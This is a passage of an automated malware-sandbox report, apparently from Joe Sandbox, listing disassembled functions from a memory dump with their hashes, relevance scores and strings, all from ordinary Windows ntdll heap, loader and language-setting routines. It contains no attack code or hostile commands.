36a003b0-36a003d1 call 3694b970 GetPEB 1344->1355 1345->1355 1365 36a005e7-36a005fb call 3694b970 1347->1365 1348->1365 1358 36a00438-36a0043c 1351->1358 1359 36a00419-36a00429 1351->1359 1352->1307 1360 36a00649-36a00654 1352->1360 1355->1343 1385 36a003d7-36a003eb 1355->1385 1361 36a0044e-36a00454 1358->1361 1362 36a0043e-36a0044c call 36983bc9 1358->1362 1359->1358 1368 36a0042b-36a00435 call 36a0dac6 1359->1368 1360->1307 1369 36a0065a-36a00663 GetPEB 1360->1369 1373 36a00457-36a00460 1361->1373 1362->1373 1397 36a005fe-36a00608 GetPEB 1365->1397 1366->1335 1376 36a00512-36a0051a 1367->1376 1377 36a00509-36a00510 1367->1377 1368->1358 1370 36a00682-36a00687 call 3694b970 1369->1370 1371 36a00665-36a00680 GetPEB call 3694b970 1369->1371 1394 36a0068c-36a006ac call 369f86ba call 3694b970 1370->1394 1371->1394 1383 36a00472-36a00475 1373->1383 1384 36a00462-36a00470 1373->1384 1387 36a00538-36a0053c 1376->1387 1388 36a0051c-36a0052c 1376->1388 1377->1376 1395 36a004e5 1383->1395 1396 36a00477-36a0047e 1383->1396 1384->1383 1385->1343 1391 36a0056c-36a00572 1387->1391 1392 36a0053e-36a00551 call 36983bc9 1387->1392 1388->1387 1398 36a0052e-36a00533 call 36a0dac6 1388->1398 1403 36a00575-36a0057c 1391->1403 1410 36a00563 1392->1410 1411 36a00553-36a00561 call 3697fe99 1392->1411 1394->1397 1395->1343 1396->1395 1402 36a00480-36a0048b 1396->1402 1397->1307 1404 36a0060e-36a00622 1397->1404 1398->1387 1402->1395 1408 36a0048d-36a00496 GetPEB 1402->1408 1403->1366 1409 36a0057e-36a0058e 1403->1409 1404->1307 1413 36a004b5-36a004ba call 3694b970 1408->1413 1414 36a00498-36a004b3 GetPEB call 3694b970 1408->1414 1409->1366 1416 36a00566-36a0056a 1410->1416 1411->1416 1422 36a004bf-36a004dd call 369f86ba call 3694b970 1413->1422 1414->1422 1416->1403 1422->1395
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                            • API String ID: 3446177414-1700792311
                                            • Opcode ID: 1f2ebd1484b22058f77c91e80e57c473ef832aa9eb61181023d07bbbabc97f91
                                            • Instruction ID: 02da9cca34a405782775193e88a3d80ba95efabde340d29d44686bc5723eb26a
                                            • Opcode Fuzzy Hash: 1f2ebd1484b22058f77c91e80e57c473ef832aa9eb61181023d07bbbabc97f91
                                            • Instruction Fuzzy Hash: ACD11179904784EFDB02DFA9D800AAEBBF2FF49314F448049E8459B252C736D982DF55
                                            Function 369FF525 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                            • API String ID: 3446177414-1745908468
                                            • Opcode ID: dd616e198e48c9cc6abe0d6ea2d06f8f8f82ddda34cc80e0536768e196e314f4
                                            • Instruction ID: 2ae363a6d8345000e0422169ba12bdcbe16ce95689c86ab6b97c5553e79e7287
                                            • Opcode Fuzzy Hash: dd616e198e48c9cc6abe0d6ea2d06f8f8f82ddda34cc80e0536768e196e314f4
                                            • Instruction Fuzzy Hash: 34912276910744DFDB02CFA9C840AADBBF2FF49719F268059E445AF262CB369C42CB51
                                            Function 36A012ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                            • API String ID: 0-3591852110
                                            • Opcode ID: 29cff6ec3cd36a0c20525d062712e0e744a99105cb2fc8d81f1f55ba7b34c0b9
                                            • Instruction ID: 3b48f458ef52712b55e37d015d168c78a480bf50023783f9fe119331574f1da1
                                            • Opcode Fuzzy Hash: 29cff6ec3cd36a0c20525d062712e0e744a99105cb2fc8d81f1f55ba7b34c0b9
                                            • Instruction Fuzzy Hash: 7C12AD74A00741EFE716CFA5D880BA6BBF1EF09318F548459E8868B652D739EC81CF91
                                            Function 3694D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                            • API String ID: 0-3532704233
                                            • Opcode ID: a1f33e7a3e7c417e4aba4d752c2986c4cab757bcbaa6603299a010c1e249b173
                                            • Instruction ID: 335006105c3edfe98b37b3104700d100088627bfee649e3c01f5b964993bf090
                                            • Opcode Fuzzy Hash: a1f33e7a3e7c417e4aba4d752c2986c4cab757bcbaa6603299a010c1e249b173
                                            • Instruction Fuzzy Hash: 81B19EB99183559FE712DF24C840A5FB7E8AF88758F52492EF888D7240DB70DD08CB92
                                            Function 36961070 Relevance: 11.4, APIs: 2, Strings: 4, Instructions: 940timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                            • API String ID: 3446177414-3570731704
                                            • Opcode ID: 4792112699b528c8224d2ec7aec55dc83f9fdde9cf01acd50156ab3db8ffe221
                                            • Instruction ID: e6e48e7e66f3bd6e414d4444e22ad95f0deb2373765d8c2644fca3b685e36128
                                            • Opcode Fuzzy Hash: 4792112699b528c8224d2ec7aec55dc83f9fdde9cf01acd50156ab3db8ffe221
                                            • Instruction Fuzzy Hash: 58923875E10328CFEB24CF1ACC40B99BBB5AF45368F2581EAD989A7251D7309E81CF51
                                            Function 3697D7B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlDebugPrintTimes.NTDLL ref: 3697D959
                                              • Part of subcall function 36954859: RtlDebugPrintTimes.NTDLL ref: 369548F7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                            • API String ID: 3446177414-1975516107
                                            • Opcode ID: a3f756a09a872be7325e416c6370e8ab35f052710283221e4b1c477561487055
                                            • Instruction ID: 887f361321a6d9333c10391b43a58728dd376a4c351265344413283d002d5c79
                                            • Opcode Fuzzy Hash: a3f756a09a872be7325e416c6370e8ab35f052710283221e4b1c477561487055
                                            • Instruction Fuzzy Hash: 3551CDB5E043459FEB11CFA9C8847CDBBB2BF44318F244159D5107B282DB75AC4ACB91
                                            Function 369E9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                            • API String ID: 0-3063724069
                                            • Opcode ID: 5f955acf0e34a8d602b8dbf2f4c3613d7e70b2af15af8b32e40bd380c7f35001
                                            • Instruction ID: b05c950fbb3a191ced81bb3fd1419d6788318ac3476bacb3e27ba7f77cfd25e6
                                            • Opcode Fuzzy Hash: 5f955acf0e34a8d602b8dbf2f4c3613d7e70b2af15af8b32e40bd380c7f35001
                                            • Instruction Fuzzy Hash: E1D1B3B2805325AFD722CB558C40BABB7ECAF84B54F44092AF9949B251E774CD48CBD3
                                            Function 3694D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                            Download Yara Rule
                                            Strings
                                            • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3694D146
                                            • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3694D262
                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3694D2C3
                                            • @, xrefs: 3694D313
                                            • @, xrefs: 3694D2AF
                                            • Control Panel\Desktop\LanguageConfiguration, xrefs: 3694D196
                                            • @, xrefs: 3694D0FD
                                            • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3694D0CF
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                            • API String ID: 0-1356375266
                                            • Opcode ID: e34ca8a0bc13b6804e46e57473c86383f964e935024d3038114673a889436aa1
                                            • Instruction ID: 9c34964510ac1e8e183dd840dc92388fe96c97f5f4217d62b29fda11c9f499b3
                                            • Opcode Fuzzy Hash: e34ca8a0bc13b6804e46e57473c86383f964e935024d3038114673a889436aa1
                                            • Instruction Fuzzy Hash: ABA16E759083459FE322DF25C840B9BB7E8BF88769F51492EF98896240D774D908CF93
                                            Function 3694F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-523794902
                                            • Opcode ID: cfb01127d7242828411f8b4d77084210587c63e431ee1c2a37110d882eb7de53
                                            • Instruction ID: a7baf98197854b539fb4fb08a7a3b79a294c67b3305f6ca81fc22d6130e73f03
                                            • Opcode Fuzzy Hash: cfb01127d7242828411f8b4d77084210587c63e431ee1c2a37110d882eb7de53
                                            • Instruction Fuzzy Hash: 3842F275A043829FE312DF25C984B2ABBE5FF84348F24456DE885CB352DB34D846CB52
                                            Function 3696B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                            • API String ID: 0-122214566
                                            • Opcode ID: a26c73f9c286642a93d04bed1cba53f3e02bc718d69809e2964b58b707ba7b9b
                                            • Instruction ID: 4f849d5338c1dd1ac836f1db97e3e8999b4825e7ee3687a143ea3d5d02dba852
                                            • Opcode Fuzzy Hash: a26c73f9c286642a93d04bed1cba53f3e02bc718d69809e2964b58b707ba7b9b
                                            • Instruction Fuzzy Hash: 16C13871F01319ABEB14CB66CC90B7E77B9AF45328F6040A9E901AB295EB74CC55C391
                                            Function 36960770 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-4253913091
                                            • Opcode ID: 53db85066fd5a05cdb66d624915bf75023cd1125734bf750061477951bd0a27a
                                            • Instruction ID: d70a12f7dcaad7a92a192a2af83346d6f74f1a5a361f4b6f640e27c4b74a6f6f
                                            • Opcode Fuzzy Hash: 53db85066fd5a05cdb66d624915bf75023cd1125734bf750061477951bd0a27a
                                            • Instruction Fuzzy Hash: A3F1ED74A00705DFEB15CF6ACA80B6AB7B6FF44358F2581A8E4059B391D730ED81CB91
                                            Function 3697F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                            Download Yara Rule
                                            Strings
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 369C02E7
                                            • RTL: Re-Waiting, xrefs: 369C031E
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 369C02BD
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                            • API String ID: 0-2474120054
                                            • Opcode ID: 78b72bab4f230f1155f64bf9f72a5ef5eefb5aace4eeb5fa235c9a374317d304
                                            • Instruction ID: fca298ed4432049a7d4d242ab5989349a7d8752fffcaf479818c96188ec953b0
                                            • Opcode Fuzzy Hash: 78b72bab4f230f1155f64bf9f72a5ef5eefb5aace4eeb5fa235c9a374317d304
                                            • Instruction Fuzzy Hash: F2E1E074A04741DFE721CF28C880B0AB7E4BF84368F200A2DF5A59B2E1DB75D945CB92
                                            Function 369751EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                            Download Yara Rule
                                            Strings
                                            • Kernel-MUI-Language-SKU, xrefs: 3697542B
                                            • Kernel-MUI-Language-Allowed, xrefs: 3697527B
                                            • Kernel-MUI-Number-Allowed, xrefs: 36975247
                                            • WindowsExcludedProcs, xrefs: 3697522A
                                            • Kernel-MUI-Language-Disallowed, xrefs: 36975352
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                            • API String ID: 0-258546922
                                            • Opcode ID: a14454466ff891a53ad252cd9498b4751ce22efb0bfd393a516c2f754ddd63c6
                                            • Instruction ID: 41bcf2f696d30d3be7b4b31d681eac7c5cbb61199cf650012bafe73cb1059c22
                                            • Opcode Fuzzy Hash: a14454466ff891a53ad252cd9498b4751ce22efb0bfd393a516c2f754ddd63c6
                                            • Instruction Fuzzy Hash: BCF12976D10229EFDF11CF99C980ADEBBFDAF48650F61406AE501A7251EA749E01CBA0
                                            Function 36A2B16B Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: dbc6fb9ded5d6d211fa0a69a286d71edc0a861a48e387c1e06b85c6af1f8dfdf
                                            • Instruction ID: 5df834b7d037f7cd41f1de04ea03d2d32dbb24421a4655b51f43ada4a1dfcbd7
                                            • Opcode Fuzzy Hash: dbc6fb9ded5d6d211fa0a69a286d71edc0a861a48e387c1e06b85c6af1f8dfdf
                                            • Instruction Fuzzy Hash: 93F11876E406118FDB08CF69C9A067DFBF6EF88204B19416DD856DF381E634EA41CB90
                                            Function 369476B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                            • API String ID: 0-3061284088
                                            • Opcode ID: 1a1f8799feb96b6e6291b35be635e7ffa9b5396ca3ded1a00a9e46315f5f402b
                                            • Instruction ID: 841947827a1d9079dfbadd78de1a2d5b8926175f8e9dba5cffab5b58f62b5423
                                            • Opcode Fuzzy Hash: 1a1f8799feb96b6e6291b35be635e7ffa9b5396ca3ded1a00a9e46315f5f402b
                                            • Instruction Fuzzy Hash: 96014C37014394EFE326D368EC09F577BF8DB82774F244049E1005B69DCAA9DC81C561
                                            Function 369670C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            • API String ID: 0-3178619729
                                            • Opcode ID: 904e2debad576450b5bef608deb65087b56e61d43d62979692e5d3f8194c281b
                                            • Instruction ID: afcb77a5a2572baeea12e02f65ea1b4a6cc522371da9db9889c37e547e524b17
                                            • Opcode Fuzzy Hash: 904e2debad576450b5bef608deb65087b56e61d43d62979692e5d3f8194c281b
                                            • Instruction Fuzzy Hash: F513AE74E00355CFEB15CF6AC9947A9BBF5FF48318F2481A9D845AB381D734A846CBA0
                                            Function 3695BEC0 Relevance: 5.7, Strings: 4, Instructions: 694COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$.mui$.mun$SystemResources\
                                            • API String ID: 0-3047833772
                                            • Opcode ID: 1e4b37aba12b10c48d997f89cc4002fb6151c84c62e859bebe5bea05eb8cb48a
                                            • Instruction ID: 44a9faeb4afae72cb188547f31a8a08903abdc8c5df6f04db1660f4e00f25c35
                                            • Opcode Fuzzy Hash: 1e4b37aba12b10c48d997f89cc4002fb6151c84c62e859bebe5bea05eb8cb48a
                                            • Instruction Fuzzy Hash: 23622672A00329DFDF20CF55CC40BE9B7B8BB0A254F5141EAE509A7A50DB719E85CF92
                                            Function 3694F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                            • API String ID: 0-2586055223
                                            • Opcode ID: a1f7f64f502d879ef12e81b0c83f205e0b098a9d2d78878493fb411bb4ae860d
                                            • Instruction ID: 677b448b9ff14857d70c295272b50a4b4410d056217cfcac2ea7e905bfb1fc91
                                            • Opcode Fuzzy Hash: a1f7f64f502d879ef12e81b0c83f205e0b098a9d2d78878493fb411bb4ae860d
                                            • Instruction Fuzzy Hash: EA613472A04785AFE312DB25DD54F6777ECEF80758F240469FA948B292DB34D800DB62
                                            Function 36A011A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
